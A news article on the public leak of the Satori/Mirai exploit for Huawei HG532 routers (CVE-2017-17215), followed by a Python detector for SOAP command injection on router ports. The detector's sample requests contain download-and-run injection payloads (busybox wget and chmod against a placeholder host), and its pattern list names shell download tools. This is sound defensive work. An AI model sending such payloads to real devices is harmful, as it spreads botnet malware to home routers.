Exploit code used by Satori, the Mirai malware variant that has attacked hundreds of thousands of Huawei routers over the past several weeks, is now public. Researchers warn the code will quickly become a commodity and be folded into other IoT botnets, such as Reaper (also known as IoTroop), for use in DDoS attacks.
Ankit Anubhav, a researcher at NewSky Security, first spotted the code on Monday after it was posted publicly on Pastebin.com. It exploits CVE-2017-17215, the zero-day vulnerability that an attacker known as “Nexus Zeta” has been using to spread the Mirai variant Satori, also known as Mirai Okiru.
“The fact that the code is now in the open means that more threat actors would now be using it. We can assume that the exploit would become a commodity, and IoT botnets that attempt to exploit a large kit of vulnerabilities will be adding CVE-2017-17215 to their arsenal,” said Maya Horowitz, threat intelligence group manager, Check Point.
Last week, Check Point identified the vulnerability (CVE-2017-17215) in Huawei's HG532 home router while it was being exploited by Nexus Zeta to spread Mirai Okiru/Satori. Huawei has since issued an updated security notice warning customers that the flaw lets a remote adversary send malicious packets to port 37215 and execute arbitrary code on vulnerable routers.
“This code is now known to a variety of black hats. Just like previous SOAP exploits released for free to the public, it will be used by various script kiddies and threat actors,” Anubhav said. NewSky Security posted a blog Thursday outlining its discovery of the zero-day code.
The underlying cause was a bug related to SOAP, a protocol used by many IoT devices for remote management, Anubhav said. Earlier SOAP-related issues (CVE-2014-8361 and the TR-064 flaw) affected other vendors' devices and were widely exploited by Mirai variants.
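For defenders, the practical takeaway from these three bugs is that they share a shape: an HTTP POST carrying a SOAP envelope to a router management port, with shell syntax stuffed into a parameter that should only ever hold a URL, hostname or address. The script below is an added example for this article, not code from NewSky Security, Check Point or Huawei. It flags that pattern in raw HTTP requests. The ports, control paths and parameter names (37215 and the DeviceUpgrade `NewStatusURL`/`NewDownloadURL` arguments for CVE-2017-17215; 7547 and `NewNTPServer1` for the TR-064 flaw; 52869 for CVE-2014-8361) are taken from the public advisories and analyses of those bugs; the sample requests are constructed for the demo and are not captured traffic, and the `192.0.2.x` addresses are documentation placeholders.

```python
"""Heuristic detector for shell-command injection in SOAP/UPnP requests
of the kind Mirai variants send to home-router management ports.

Added example for this article; not code from NewSky Security, Check Point
or Huawei. Port/action details come from public advisories; sample requests
below are constructed, not captured.
"""
import re
from typing import Dict, List, Optional, Tuple

# SOAP management ports abused by Mirai-family bots (public advisories):
#   37215  Huawei HG532 UPnP DeviceUpgrade   (CVE-2017-17215, Satori/Okiru)
#   52869  Realtek SDK miniigd UPnP         (CVE-2014-8361)
#   7547   TR-064/TR-069 CPE management     (TR-064 SetNTPServers injection)
SOAP_PORTS: Dict[int, str] = {37215: "CVE-2017-17215", 52869: "CVE-2014-8361", 7547: "TR-064"}

# Shell constructs a legitimate URL/host/IP argument never contains.
# '$(' and backticks are the substitution forms seen in the public payloads;
# the busybox/wget/tftp/chmod tokens catch the usual download-and-run stage.
SHELL_INJECTION = re.compile(
    r"\$\(|`|;|\|\||&&|\bbusybox\b|\bwget\b|\btftp\b|\bchmod\b|/tmp/"
)

# UPnP/TR-064 argument elements are conventionally named New<Something>.
ELEMENT_TEXT = re.compile(r"<(New[A-Za-z0-9]+)>(.*?)</\1>", re.S)


def parse_http_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify_request(dst_port: int, raw: str) -> Optional[dict]:
    """Return a finding for a SOAP POST to a known router port whose
    New* arguments contain shell syntax; None for anything else."""
    if dst_port not in SOAP_PORTS:
        return None
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or "soapaction" not in headers:
        return None
    hits: List[Tuple[str, str]] = [
        (name, value.strip())
        for name, value in ELEMENT_TEXT.findall(body)
        if SHELL_INJECTION.search(value)
    ]
    if not hits:
        return None
    return {
        "cve": SOAP_PORTS[dst_port],
        "port": dst_port,
        "path": path,
        "soapaction": headers["soapaction"].strip('"'),
        "injected_params": hits,
    }


def scan(traffic: List[Tuple[int, str]]) -> List[dict]:
    """Run classify_request over (dst_port, raw_request) pairs."""
    return [f for f in (classify_request(p, r) for p, r in traffic) if f]


def _request(path: str, soapaction: str, body: str) -> str:
    """Build a constructed HTTP/1.1 SOAP POST for the demo."""
    return (
        f"POST {path} HTTP/1.1\r\nHost: 192.0.2.1\r\nContent-Type: text/xml\r\n"
        f'SOAPAction: "{soapaction}"\r\nContent-Length: {len(body)}\r\n\r\n{body}'
    )


UPGRADE_SVC = "urn:schemas-upnp-org:service:DeviceUpgrade:1"
# Constructed: a well-formed Upgrade call with plain URLs (should not alert).
BENIGN_UPGRADE = _request("/ctrlt/DeviceUpgrade_1", UPGRADE_SVC + "#Upgrade",
    f'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    f'<u:Upgrade xmlns:u="{UPGRADE_SVC}"><NewStatusURL>http://192.0.2.1/status'
    f'</NewStatusURL><NewDownloadURL>http://192.0.2.1/fw.bin</NewDownloadURL>'
    f'</u:Upgrade></s:Body></s:Envelope>')
# Constructed: Satori-style injection via $(...) in NewStatusURL.
SATORI_STYLE = _request("/ctrlt/DeviceUpgrade_1", UPGRADE_SVC + "#Upgrade",
    f'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    f'<u:Upgrade xmlns:u="{UPGRADE_SVC}"><NewStatusURL>$(/bin/busybox wget -g '
    f'192.0.2.10 -l /tmp/.x -r /x;/bin/busybox chmod 777 /tmp/.x;/tmp/.x)'
    f'</NewStatusURL><NewDownloadURL>HUAWEIUPNP</NewDownloadURL>'
    f'</u:Upgrade></s:Body></s:Envelope>')
# Constructed: TR-064 SetNTPServers injection via backticks.
TR064_STYLE = _request("/UD/act?1", "urn:dslforum-org:service:Time:1#SetNTPServers",
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>'
    '`cd /tmp;wget http://192.0.2.10/x;chmod +x x;./x`</NewNTPServer1>'
    '</u:SetNTPServers></s:Body></s:Envelope>')

if __name__ == "__main__":
    for finding in scan([(37215, BENIGN_UPGRADE), (37215, SATORI_STYLE), (7547, TR064_STYLE)]):
        print(finding["cve"], finding["port"], finding["path"], finding["injected_params"])
```

The port gate keeps the rule cheap on a busy sensor, and the `New*` element scan works for all three exploit families without per-bug signatures. Two tuning points: a bare `;` can appear in legitimate URL arguments, so drop it from `SHELL_INJECTION` if you see false positives, and an attacker can XML-escape metacharacters (`&amp;&amp;`), so unescape element text before matching when you deploy this against real traffic.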